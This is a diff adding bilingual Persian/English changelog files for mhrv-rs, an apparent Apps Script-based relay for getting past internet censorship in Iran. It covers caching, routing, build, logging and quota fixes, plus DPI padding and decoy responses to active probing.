+• Negative-cache برای destinationهای unreachable + pre-warm بزرگ‌تر در startup ([#280](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/280)): گوشی‌های بدون IPv6 وقتی پروب IPv6-only host (مثلاً `ds6.probe.whatismyipaddress.com`) می‌فرستن، 5+ batch Apps Script در ثانیه روی destination تضمین‌fail هدر می‌رفت. حالا cache 30s × 256-entry در `TunnelMux` نگه می‌داره برای destinationهایی که tunnel-node با `Network is unreachable` یا `No route to host` پاسخ داده — short-circuit به `502 Bad Gateway` (HTTP CONNECT) یا `0x04 Host unreachable` (SOCKS5) برای هر retry بعدی. Pre-warm pool startup هم بزرگتر شد (۱۲ تا ۲۴ connection به‌جای ۸) برای کمتر شدن first-use latency. ممنون از @dazzling-no-more
+---
+• Fix "video timeout when 'Send YouTube through relay' is on" ([#275](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/275)): previously, `youtube_via_relay = true` routed every YouTube-related domain through Apps Script — including `googlevideo.com` (video chunks) and `ytimg.com` (thumbnails). Result: a single chunk timeout aborted entire Firefox playbacks, and long videos hit Apps Script's 6-min execution cap mid-playback. **Fix:** `youtube_via_relay` now only relays the API/HTML hosts (`youtube.com`, `youtu.be`, `youtube-nocookie.com`, `youtubei.googleapis.com` — where Restricted Mode is enforced), while video/image CDNs go direct via Google edge (`googlevideo.com` was missing from the SNI rewrite list entirely; now added; `ytimg.com`, `ggpht.com` stay on SNI rewrite always). Restricted Mode bypass without breaking playback. Thanks @amirabbas117 for the detailed analysis
+• Negative-cache for unreachable destinations + larger startup pre-warm pool ([#280](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/280)): on devices without IPv6, OS/app probes to IPv6-only hostnames (e.g. `ds6.probe.whatismyipaddress.com`) were burning 5+ Apps Script batches per second on a guaranteed-fail destination. `TunnelMux` now keeps a 30s × 256-entry cache of destinations the tunnel-node returned `Network is unreachable` / `No route to host` for, and short-circuits subsequent CONNECTs with `502 Bad Gateway` (HTTP CONNECT) or `0x04 Host unreachable` (SOCKS5). Startup pre-warm pool also grew (12 → 24 connections) to reduce first-use latency. Thanks @dazzling-no-more
diff --git a/docs/changelog/v1.7.5.md b/docs/changelog/v1.7.5.md
new file mode 100644
index 00000000..5696630f
--- /dev/null
+++ b/docs/changelog/v1.7.5.md
@@ -0,0 +1,6 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• گزینهٔ جدید `block_quic` در config برای رد کردن client-side QUIC ([#213](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/213)): با `"block_quic": true` در `config.json`، listener SOCKS5 UDP هر datagramی به مقصد port 443 (یعنی HTTP/3-over-UDP) رو silent drop می‌کنه. browser به TCP/HTTPS fallback می‌کنه (که از مسیر CONNECT معمولی رد می‌شه و از relay می‌گذره). برای کاربرهایی که QUIC TCP-meltdown رو در Full mode تجربه می‌کنن (پهنای باند < 1 Mbps در عوض > 50 Mbps با TCP/HTTPS) خوبه. به‌صورت opt-in (پیش‌فرض false). ممنون از @w0l4i
+• release artifacts دوباره به پوشهٔ `releases/` در مخزن commit می‌شن (به درخواست کاربر تلگرام): پس از v1.1.0 این عادت متوقف شده بود — حالا بعد از هر release tag، workflow خودکار فایل‌های pre-built رو در پوشه `releases/` به‌روزرسانی می‌کنه. کاربرانی که به صفحه GitHub Releases دسترسی ندارن (به‌خاطر فیلتر در ایران) می‌تونن از طریق `Code → Download ZIP` به فایل‌های آخرین نسخه برسن. صفحه release رسمی همچنان artifact‌های versioned رو داره — این پوشه fallback هست
+---
+• New `block_quic` config option for client-side QUIC drop ([#213](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/213)): set `"block_quic": true` in `config.json` and the SOCKS5 UDP relay silently drops any datagram destined for port 443 (HTTP/3-over-UDP). The client's QUIC stack retries a couple of times and then falls back to TCP/HTTPS, which goes through the regular CONNECT path and through the relay. Useful for users seeing QUIC TCP-meltdown in Full mode (sub-1 Mbps where TCP/HTTPS does 50+). Opt-in (default false). Thanks @w0l4i
+• Release artifacts now committed back to the in-repo `releases/` folder (per Telegram channel request): the practice was stopped after v1.1.0 — now after every release tag, the workflow auto-refreshes `releases/` with the pre-built binaries. Users behind GitHub-Releases-page filtering can grab the latest version via `Code → Download ZIP`. The official release page still has versioned artifacts; the in-repo folder is the fallback path
diff --git a/docs/changelog/v1.7.6.md b/docs/changelog/v1.7.6.md
new file mode 100644
index 00000000..58d20ef0
--- /dev/null
+++ b/docs/changelog/v1.7.6.md
@@ -0,0 +1,4 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• Revert غلط v1.7.4 برای `googlevideo.com` ([#275](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/275)، [#281](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/281)): v1.7.4 تلاش کرد `googlevideo.com` رو به لیست SNI rewrite اضافه کنه به این تئوری که chunk‌های ویدیو باید از Apps Script relay دور بزنن. **چندین کاربر گزارش دادن که v1.7.4 YouTube رو کاملاً شکست داد** — علت: `googlevideo.com` توسط edge IP‌های جدا "EVA" گوگل serve می‌شه، نه GFE IP عادی که `google_ip` کاربر معمولاً به اون اشاره می‌کنه. SNI-rewrite کردن `googlevideo.com:443` به یه GFE IP باعث TLS handshake failure یا wrong-cert error برای اون کاربرها شد. **رفتار قبل از v1.7.4 برگشته** (chunk‌های ویدیو از مسیر Apps Script relay می‌رن — کندتر ولی روی هر GFE IP قابل اعتماد). تغییرات `youtube_via_relay` carve-out از v1.7.4 (که `ytimg.com` رو از relay پاک کرد) دست نخورده — اون regression جدا بود و درست شده باقی مونده. اگه کاربری در آینده EVA edge IP خودش رو پیکربندی بکنه، یه knob مجزا اضافه می‌کنیم.
+---
+• Revert v1.7.4 `googlevideo.com` SNI rewrite ([#275](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/275), [#281](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/281)): v1.7.4 added `googlevideo.com` to the SNI rewrite list on the theory that video chunks should bypass the Apps Script relay. **Multiple users reported v1.7.4 broke YouTube entirely** — root cause: `googlevideo.com` is served by Google's separate "EVA" edge IPs, not the regular GFE IPs that `google_ip` typically points at. SNI-rewriting `googlevideo.com:443` to a GFE IP got TLS handshake failures or wrong-cert errors for those users. **Pre-v1.7.4 behaviour is restored** (video chunks go via the Apps Script relay path — slower but reliable on every GFE IP). The other v1.7.4 `youtube_via_relay` carve-out changes (which removed `ytimg.com` from the carve-out) are intact — those were a separate fix that's still correct. If a user ever wants direct googlevideo.com routing, that needs a separate config knob letting them specify their EVA edge IP independently.
diff --git a/docs/changelog/v1.7.7.md b/docs/changelog/v1.7.7.md
new file mode 100644
index 00000000..13f3cf54
--- /dev/null
+++ b/docs/changelog/v1.7.7.md
@@ -0,0 +1,6 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• اضافه شدن build برای ویندوز ۳۲ بیتی (i686-pc-windows-msvc) به matrix release ([#272](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/272), [#288](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/288)): کاربری که سیستم قدیمی ویندوز ۳۲ بیتی داشت درخواست build اختصاصی کرد. حالا artifact ‫`mhrv-rs-windows-i686.zip`‬ هم در release page موجوده. ممنون از @amiralishoja برای PR
+• رفع باگ "یک deployment معیوب همه ‍session‌ها رو روی cadence legacy گیر می‌اندازه" ([#290](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/290)): قبلاً وقتی یکی از deployment‌ها fast-empty (long-poll نمی‌شناخت) برمی‌گردوند، flag global `server_no_longpoll` فعال می‌شد و کل session‌ها رو روی cadence ۳۰ ثانیه‌ای legacy گیر می‌انداخت — حتی اگه deployment‌های دیگه راحت long-poll می‌کردن. اون flag همچنین هیچ‌وقت reset نمی‌شد، پس tunnel-node بازنشانده تا restart process به مسیر سریع برنمی‌گشت. **Fix:** state per-deployment با TTL ۶۰ ثانیه. flag aggregate فقط وقتی فعال می‌شه که **همه** deployment‌های یکتا mark شده باشن، و خودش رو از روی expiry self-correct می‌کنه. tunnel-node ارتقا داده شده خودش به مسیر long-poll fast بدون restart برمی‌گرده. ۴ تست جدید با `tokio::test(start_paused = true)` پوشش‌دهی timing logic. ممنون از @dazzling-no-more
+---
+• Add 32-bit Windows (i686-pc-windows-msvc) to the release matrix ([#272](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/272), [#288](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/288)): a user with a legacy 32-bit Windows machine asked for a dedicated build. `mhrv-rs-windows-i686.zip` now appears alongside the other artifacts on every release page. Thanks @amiralishoja for the PR
+• Fix "one degraded deployment drags all sessions onto the legacy cadence" bug ([#290](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/290)): previously, a single fast-empty observation from any one deployment flipped the global `server_no_longpoll` flag, dragging every session onto the 30-second legacy cadence even when the other deployments were happily long-polling. The flag also never reset, so a redeployed/recovered tunnel-node didn't return to the fast path until the mhrv-rs process restart. **Fix:** state is now per-deployment with a 60-second TTL. The aggregate flag flips only when **every** unique configured deployment is marked, and self-corrects on read when entries expire. An upgraded tunnel-node rejoins the long-poll fast path on its own. 4 new tests using `tokio::test(start_paused = true)` to cover the timing logic without burning real wall-clock seconds. Thanks @dazzling-no-more
diff --git a/docs/changelog/v1.7.8.md b/docs/changelog/v1.7.8.md
new file mode 100644
index 00000000..6f7d9030
--- /dev/null
+++ b/docs/changelog/v1.7.8.md
@@ -0,0 +1,4 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• Blacklist خودکار deployment با timeout مکرر در batch ([#319](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/319)): قبلاً وقتی یک deployment hang می‌کرد (معمولاً به دلیل `TUNNEL_SERVER_URL` قدیمی که به host از کار افتاده اشاره می‌کرد، یا Apps Script که UrlFetchApp داخلش hang کرده بود)، round-robin مدام trafficرو به همون deployment می‌فرستاد و sessionها timeout می‌خوردند بدون recovery تا restart process. **Fix:** state per-deployment با window ۳۰ ثانیه‌ای — ۳ timeout در پنجره ۳۰ ثانیه‌ای منجر به blacklist با cooldown ۱۲۰ ثانیه می‌شه. هر batch موفق strikeها رو پاک می‌کنه. cooldown کوتاه (۲ دقیقه به‌جای ۱۰ دقیقه برای quota) تا deploymentای که سریع recover می‌شه به‌سرعت برگرده. مستقل از blacklist موجود برای quota-error (که هنوز ۱۰ دقیقه cooldown داره). برای scenario `5 از 8 deployment کهنه`: بعد از یک batch، ۳ deployment dropped می‌شن و session جدید با احتمال خیلی بیشتر روی deployment سالم می‌افته. ممنون از @dazzling-no-more
+---
+• Auto-blacklist deployments after sustained batch timeouts ([#319](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/319)): previously, when a single deployment hung (most commonly due to a stale `TUNNEL_SERVER_URL` pointing at a dead host, or Apps Script's internal `UrlFetchApp` stalling), round-robin kept dispatching real traffic to it. Sessions piled into the bad deployment and timed out without recovery until the user restarted mhrv-rs. **Fix:** per-deployment strike counter with a 30-second sliding window — 3 timeouts in 30 s triggers a 120-second cooldown blacklist. Any successful batch clears the strike counter, so unrelated transient blips can't accumulate across hours. Short cooldown (2 min vs. the 10 min permanent-blacklist for quota errors) so a deployment that recovers rejoins the round-robin quickly. For the "5 of 8 deployments stale" scenario: after one batch each, the 3 dead deployments drop out and new sessions land on healthy deployments with much higher probability. Distinct from the quota blacklist (still 600s cooldown). Thanks @dazzling-no-more
diff --git a/docs/changelog/v1.7.9.md b/docs/changelog/v1.7.9.md
new file mode 100644
index 00000000..15a7c657
--- /dev/null
+++ b/docs/changelog/v1.7.9.md
@@ -0,0 +1,4 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• رفع باگ "binary i686 ویندوز روی Windows 7 ۳۲ بیتی load نمی‌شه" ([#318](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/318)، [#323](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/323)): از Rust 1.78 (می ۲۰۲۴) std `GetSystemTimePreciseAsFileTime` (Win8+) رو به‌جای `GetSystemTimeAsFileTime` (Win2k+) کرد، و این نیاز کرد binary ویندوز ۳۲ بیتی از kernel32 یه export که تو Win7 وجود نداره use کنه. binary v1.7.7/v1.7.8 با خطای `the procedure entry point GetSystemTimePreciseAsFile could not be located in the dynamic link library kernel32.dll` روی Win7 SP1 بسته می‌شد. **Fix:** فقط target `i686-pc-windows-msvc` رو در workflow CI به Rust 1.77.2 (آخرین stable Win7-compatible) pin کردیم. سایر targets روی stable می‌مونن. این یعنی artifact `mhrv-rs-windows-i686.zip` در v1.7.9 روی Win7 SP1 ۳۲ بیتی load می‌شه. ممنون از @Im-P3dro برای گزارش
+---
+• Fix "i686 Windows binary fails to load on Windows 7 32-bit" ([#318](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/318), [#323](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/323)): Rust 1.78 (May 2024) raised std's Windows MSRV from Win7 to Win10 by switching `std::time` to `GetSystemTimePreciseAsFileTime` (Win8+ in kernel32) instead of the older `GetSystemTimeAsFileTime`. The v1.7.7 and v1.7.8 i686 Windows binaries failed to load on Win7 SP1 with `the procedure entry point GetSystemTimePreciseAsFile could not be located in the dynamic link library kernel32.dll`, defeating the entire reason that target ships (legacy Win7 32-bit boxes per #272). **Fix:** pin only the `i686-pc-windows-msvc` CI matrix entry to Rust 1.77.2 (the last stable that targets Win7); every other target stays on `@stable`. The `mhrv-rs-windows-i686.zip` artifact in v1.7.9 once again loads on Win7 SP1. Thanks @Im-P3dro for the report.
diff --git a/docs/changelog/v1.8.0.md b/docs/changelog/v1.8.0.md
new file mode 100644
index 00000000..77a79bd7
--- /dev/null
+++ b/docs/changelog/v1.8.0.md
@@ -0,0 +1,12 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• Padding random برای پایلود Apps Script ([#313](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/313)، [#365](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/365) Section 1): هر request به Apps Script حالا یک فیلد `_pad` با طول uniform-random بین ۰-۱۰۲۴ بایت اضافه می‌کنه — به‌صورت base64 encoded. بدون این، طول request body در هر mode تقریباً ثابت می‌مونه + DPI ایران می‌تونه بر اساس distribution طول fingerprint بزنه. حالا packet sizes uniformly distributed هستن + length-clustering match نمی‌کنه. تأثیر bandwidth: متوسط ۵۱۲ بایت اضافه به batch ~۲KB = +۲۵٪، negligible در برابر floor latency Apps Script. backward-compatible: Code.gs قدیم هم کار می‌کنه (unknown JSON fields ignore می‌شن).
+• Defense active probing: decoy 200 HTML در Code.gs / CodeFull.gs روی AUTH_KEY بد ([#365](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/365) Section 3): قبلاً request بدون auth `{"e":"unauthorized"}` JSON برمی‌گردوند — fingerprint مشخص "این یه API endpoint هست". حالا یه HTML benign placeholder برمی‌گردونه که شبیه یه Apps Script web app forgotten-but-public هست. scanner active که با AUTH_KEY ساختگی POST می‌کنه categorize می‌کنه به‌عنوان "non-tunnel، nothing interesting". flag `DIAGNOSTIC_MODE` برای setup که response قدیمی JSON رو برمی‌گردونه — default `false` (production-strong)
+• Defense active probing: decoy 404 nginx در tunnel-node روی auth بد: tunnel-node قبلاً `{"e":"unauthorized"}` JSON برمی‌گردوند. حالا response 404 با body HTML شبیه nginx default error می‌فرسته (active scanners "static web server هست، tunnel نیست" تشخیص می‌دن). env var `MHRV_DIAGNOSTIC=1` برای setup behavior قدیمی رو فعال می‌کنه
+• رفع باگ "Usage today (estimated) در Full mode همیشه ۰" ([#230](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/230)، [#362](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/362)): counter `today_calls` و `today_bytes` فقط روی apps_script-mode relay path در `domain_fronter::relay()` افزایش می‌یافت. Full mode از `tunnel_client::fire_batch` می‌گذره که کانتر رو زد. حالا fire_batch بعد از batch موفق `record_today(response_bytes)` رو صدا می‌زنه — bytes از sum طول `d` و `pkts` در BatchTunnelResponse تخمین زده می‌شه. Full mode users حالا "Usage today" واقعی می‌بینن
+• رفع باگ "quota reset countdown با time UTC به‌جای PT نشون داده می‌شه" ([#230](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/230)، [#362](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/362)): Apps Script's UrlFetchApp quota در 00:00 **Pacific Time** ریست می‌شه (PST/PDT با DST)، نه UTC. ما UTC midnight رو نشون می‌دادیم — ۷-۸ ساعت off. fix: helpers جدید `current_pt_day_key()` + `seconds_until_pacific_midnight()` با hand-rolled DST detection (بدون اضافه کردن chrono-tz / 3MB tzdb). UI label "UTC day" → "PT day" تغییر کرد. ۲ test جدید برای DST window boundaries (مارس ۲۰۲۴/۲۰۲۶/۲۰۲۷، نوامبر ۲۰۲۴/۲۰۲۶) + Sakamoto's day-of-week
+---
+• Random payload padding for Apps Script requests ([#313](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/313), [#365](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/365) Section 1): every outbound request to Apps Script now carries a `_pad` field of uniform-random length 0–1024 bytes (base64 encoded). Before this, request body sizes within each mode were tightly clustered, giving ISP DPI a clean length-distribution fingerprint to match against. Now packet sizes are spread uniformly across the range so length-clustering DPI heuristics can't match. Bandwidth cost: ~512 bytes added to a typical 2 KB tunnel batch = +25%, negligible against Apps Script's per-call latency floor. Backward-compatible: old Code.gs deployments ignore the unknown field. Applied at all three payload-build sites: single relay, single tunnel op, batch tunnel.
+• Active-probing defense: decoy 200 HTML on bad AUTH_KEY in `Code.gs` and `CodeFull.gs` ([#365](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/365) Section 3): previously a request with a missing/wrong AUTH_KEY got `{"e":"unauthorized"}` as a JSON body — a clear "this is some kind of API endpoint" signal that active scanners can fingerprint. Now bad-auth requests get a benign HTML placeholder page that looks like a forgotten-but-public Apps Script web app, indistinguishable from the millions of stale Apps Script projects on Google's infrastructure. New `DIAGNOSTIC_MODE` const (default `false`) restores the old JSON error response for setup/debugging — flip to `true` while configuring a misconfigured client, then back to `false` before sharing the deployment widely.
+• Active-probing defense: decoy 404 nginx-style HTML on bad auth in `tunnel-node` ([#365](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/365) Section 3): previously a bad-auth request got `{"e":"unauthorized"}`. Now it gets an HTTP 404 with an `nginx`-style error page body, looking like a vanilla static web server. Active scanners that POST malformed payloads to `/tunnel` to discover proxy endpoints categorize this host as "boring" and move on. New `MHRV_DIAGNOSTIC=1` env var restores the verbose JSON error during setup; default is the production decoy.
+• Fix "Usage today (estimated) is always 0 in Full mode" ([#230](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/230), [#362](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/362)): the daily-usage counters (`today_calls` / `today_bytes`) were incremented only on the `apps_script`-mode relay path inside `domain_fronter::relay()`. Full-mode traffic goes through `tunnel_client::fire_batch` which never wired the counter. Now `fire_batch` calls `record_today(response_bytes)` after each successful batch — bytes are estimated from the sum of per-session `d` (TCP payload) and `pkts` (UDP datagrams) lengths in the `BatchTunnelResponse`, which is a stable proxy for "how much did this batch move." Full mode users now see real usage numbers instead of stuck-at-zero.
+• Fix "quota reset countdown shown in UTC instead of Pacific Time" ([#230](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/230), [#362](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/362)): Apps Script's `UrlFetchApp` quota actually resets at midnight Pacific Time (PST/PDT — observes DST), not midnight UTC. We were displaying the countdown to UTC midnight, which is 7–8 hours off depending on DST. Fix: new `current_pt_day_key()` + `seconds_until_pacific_midnight()` helpers using a hand-rolled US DST detector (2nd Sunday of March → 1st Sunday of November = PDT, otherwise PST) so we don't pull `chrono-tz` and a ~3 MB IANA tzdb just for one helper. UI label updated from "UTC day" to "PT day". Two new tests pin down the DST window boundaries (March 2024 / 2026 / 2027, November 2024 / 2026) and Sakamoto's day-of-week formula.
diff --git a/docs/changelog/v1.8.1.md b/docs/changelog/v1.8.1.md
new file mode 100644
index 00000000..56bcadc2
--- /dev/null
+++ b/docs/changelog/v1.8.1.md
@@ -0,0 +1,8 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• تشخیص خطای decoy v1.8.0 در سمت کلاینت — پیغام واضح به‌جای cryptic ([#404](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/404)، [#310](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/310)): قبلاً وقتی deployment auth fail می‌گرفت + decoy HTML برمی‌گردوند، client پیغام `WARN batch failed: bad response: no json in batch response: <!DOCTYPE html>...` می‌داد. کاربر باید خودش متن decoy رو می‌شناخت تا تشخیص بده. حالا client decoy رو با string-match تشخیص می‌ده + پیغام explicit می‌ده: "got the v1.8.0 bad-auth decoy — your AUTH_KEY in mhrv-rs config does NOT match the AUTH_KEY in this deployment's Code.gs. Either fix the mismatch + redeploy as a NEW VERSION, or set DIAGNOSTIC_MODE=true at the top of Code.gs + redeploy to see the explicit JSON `unauthorized` error during setup." — کاربر مستقیم می‌فهمه چی بکنه + ساعت‌ها debug ذخیره می‌شه
+• اضافه شدن `script_id` به همه log‌های batch-failure ([#404](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/404)): قبلاً log `WARN batch failed: ...` نام deployment که fail کرد رو نشون نمی‌داد. در multi-deployment scenarios (5-10 deployment که برخی AUTH_KEY اشتباه داره)، کاربر نمی‌تونست بدون سختی deployment معیوب رو identify کنه. حالا همه پیغام‌های failure (timeout، bad response، decoy، missing-response-in-batch) شامل short prefix script_id هستند: `batch failed (script AKfycbz4): ...`. این + flag تشخیص decoy، اولین diagnostic از سرنوشت توزیع کاربری به طور reliable
+• Flag config جدید `disable_padding: true` ([#391](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/391)): پیش‌فرض `false` (padding فعال = DPI defense). برای کاربران روی ISP‌های heavily-throttled که هزینه padding ~۲۵٪ bandwidth با throttle compounds + batchهای borderline-working رو into timeout می‌اندازه، گذاشتن `"disable_padding": true` در config.json در ازای محافظت length-distribution DPI، headroom برمی‌گردونه. توصیه نیست speculatively فعال بشه — فقط بعد از measurement throughput improvement.
+---
+• Client-side decoy detection — clear hint instead of cryptic error ([#404](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/404), [#310](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/310)): previously when a deployment had a stale/wrong AUTH_KEY, mhrv-rs returned the v1.8.0 bad-auth decoy HTML, and the client logged `WARN batch failed: bad response: no json in batch response: <!DOCTYPE html>...` — leaving the user to recognize the decoy body string and infer the cause. Now the client string-matches the decoy and emits an explicit error: "got the v1.8.0 bad-auth decoy — your AUTH_KEY in mhrv-rs config does NOT match the AUTH_KEY in this deployment's Code.gs. Either fix the mismatch + redeploy as a NEW VERSION (Apps Script doesn't auto-pick-up AUTH_KEY edits without an explicit redeploy), or set DIAGNOSTIC_MODE=true at the top of Code.gs + redeploy to see the explicit JSON `unauthorized` error during setup." Saves users hours of staring at "no json in batch response" trying to figure out what's wrong.
+• Add `script_id` to every batch-failure log line ([#404](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/404)): previously `WARN batch failed: ...` didn't identify which deployment failed. In multi-deployment setups (5-10 deployments where one or two have a stale AUTH_KEY), users couldn't identify the culprit without the per-deployment curl probe loop. Every failure log line now includes the short script_id prefix: `batch failed (script AKfycbz4): ...`, applied to all four failure paths (timeout, bad response, decoy, missing-response-in-batch). Together with the decoy detection above, the first reliable diagnostic for the multi-deployment-with-one-bad-AUTH_KEY user pattern.
+• New `disable_padding: true` config flag ([#391](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/391)): default `false` (padding active, full DPI defense). For users on heavily-throttled ISPs where the v1.8.0 random-padding cost (+~25% bandwidth per batch) compounds with the throttle to push borderline-working batches into timeouts, setting `"disable_padding": true` in `config.json` recovers headroom in exchange for losing length-distribution DPI defense. Don't flip on speculatively — for users where Apps Script outbound is uncongested, padding is free defense. Only enable if you've measured throughput improvement after the flip on your specific ISP path.
diff --git a/docs/changelog/v1.8.2.md b/docs/changelog/v1.8.2.md
new file mode 100644
index 00000000..9350c9c3
--- /dev/null
+++ b/docs/changelog/v1.8.2.md
@@ -0,0 +1,6 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• اصلاح log level در UI binary (Windows + Android) ([#401](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/401)): قبلاً `mhrv-rs-ui` (و Android) فیلتر tracing رو فقط از `RUST_LOG` env var یا default `info,hyper=warn` می‌خوند — مقدار `log_level` در `config.json` در عمل ignore می‌شد. فرم UI combobox `log_level` داشت ولی هیچ‌جا به subscriber اعمال نمی‌شد. حالا precedence اینه: `RUST_LOG` (اگر set باشد) > `config.log_level` > `info,hyper=warn`. علاوه بر این Save در UI الان log level رو live اعمال می‌کنه (بدون نیاز به restart) از طریق reload handle. CLI `mhrv-rs` از قبل درست کار می‌کرد — این فقط fix UI bin بود.
+• پیغام تشخیص decoy ملایم‌تر — به‌جای assert AUTH_KEY mismatch، چهار علت ممکن enumerate می‌کنه ([#404](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/404)): @w0l4i گزارش داد همان `script_id` گاهی decoy و گاهی موفقیت برمی‌گرده در یک دقیقه — یعنی NOT AUTH_KEY mismatch (اگر بود ۱۰۰٪ fail می‌گرفت). تحقیق نشون داد body string `"The script completed but did not return anything"` اختصاصی به decoy v1.8.0 ما نیست — Apps Script همان body رو در ۴ سناریو برمی‌گردونه: (۱) AUTH_KEY mismatch (decoy ما، intentional)، (۲) Apps Script execution timeout یا quota tear، (۳) Google-side internal hiccup، (۴) ISP-side response truncation (#313 pattern). Error message v1.8.1 false positive داشت در سناریو ۲-۴. حالا پیغام: "got the v1.8.0 decoy/placeholder body — could be (1) AUTH_KEY mismatch, (2) Apps Script execution timeout/quota tear, (3) Apps Script internal hiccup, (4) ISP-side response truncation. Set DIAGNOSTIC_MODE=true to disambiguate (1) — only AUTH_KEY mismatch returns this body in diagnostic mode." کاربر action درست رو کشف می‌کنه.
+---
+• Fix log level on the UI binary (Windows + Android) ([#401](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/401)): previously `mhrv-rs-ui` (and Android, which uses the same JNI path) installed its tracing filter from `RUST_LOG` only — falling back to `info,hyper=warn` when unset. The `log_level` field in `config.json` was effectively ignored, even though the UI form has a combobox that writes to it. The CLI binary (`mhrv-rs`) read `config.log_level` correctly via `init_logging()`; only the UI binary was broken. New precedence: `RUST_LOG` (explicit override) > `config.log_level` (what the user picked in the form) > `info,hyper=warn` (default). The Save button now also reinstalls the filter live via a `tracing_subscriber::reload::Handle`, so users don't need to restart for a level change to take effect. RUST_LOG still wins if set at boot — explicit override beats config in both directions.
+• Soften the v1.8.1 decoy detection error message — enumerate four candidate causes instead of asserting AUTH_KEY mismatch ([#404](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/404)): @w0l4i reported the same `script_id` mixing decoy ERROR with successful batches inside a one-minute window — which rules out AUTH_KEY mismatch as the cause (a real mismatch fails 100% of batches against that deployment, never succeeds intermittently). Investigation showed the body string `"The script completed but did not return anything"` is **not** unique to our v1.8.0 bad-auth path — Apps Script itself returns the same body in three other unrelated cases: (2) Apps Script execution timeout or per-100s quota tear, (3) Google-side internal runtime hiccup, (4) ISP-side response truncation mid-flight (the #313 pattern). The v1.8.1 error message was a false positive in scenarios 2-4. The v1.8.2 message now reads: "got the v1.8.0 decoy/placeholder body — could be (1) AUTH_KEY mismatch (run a direct curl probe against the deployment to verify), (2) Apps Script execution timeout or per-100s quota tear (try lowering parallel_concurrency), (3) Apps Script internal hiccup (transient, retry next batch), or (4) ISP-side response truncation (#313 pattern, try a different google_ip). To distinguish (1) from the rest: set DIAGNOSTIC_MODE=true at the top of Code.gs + redeploy as new version — only AUTH_KEY mismatch returns this body in diagnostic mode." Users now have an actionable narrowing procedure instead of a confidently-wrong assertion.
diff --git a/docs/changelog/v1.8.3.md b/docs/changelog/v1.8.3.md
new file mode 100644
index 00000000..f408ce94
--- /dev/null
+++ b/docs/changelog/v1.8.3.md
@@ -0,0 +1,12 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• cache spreadsheet اختیاری در Code.gs برای کاهش مصرف quota ([#400](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/400)، PR [#443](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/443) از @euvel): GET requests عمومی که Cache-Control header دارن می‌تونن از Google Sheet به‌جای Apps Script's UrlFetchApp serve بشن. هزینه‌ی هر cache hit ~۵-۲۰ms (Sheet read) به‌جای ۲۵۰-۵۰۰ms (UrlFetchApp roundtrip). features کامل: TTL-aware (max-age, no-cache, no-store, private respect)، header rewriting (Date/Age/X-Cache)، circular buffer برای O(1) writes، Vary-aware با Accept-Encoding/Accept-Language. opt-in via یک constant `CACHE_SPREADSHEET_ID` در Code.gs — default غیرفعال، بدون overhead برای کاربران که نمی‌خوان. setup: ساخت یک Google Sheet جدید + قرار دادن ID آن در `CACHE_SPREADSHEET_ID` + redeploy as new version
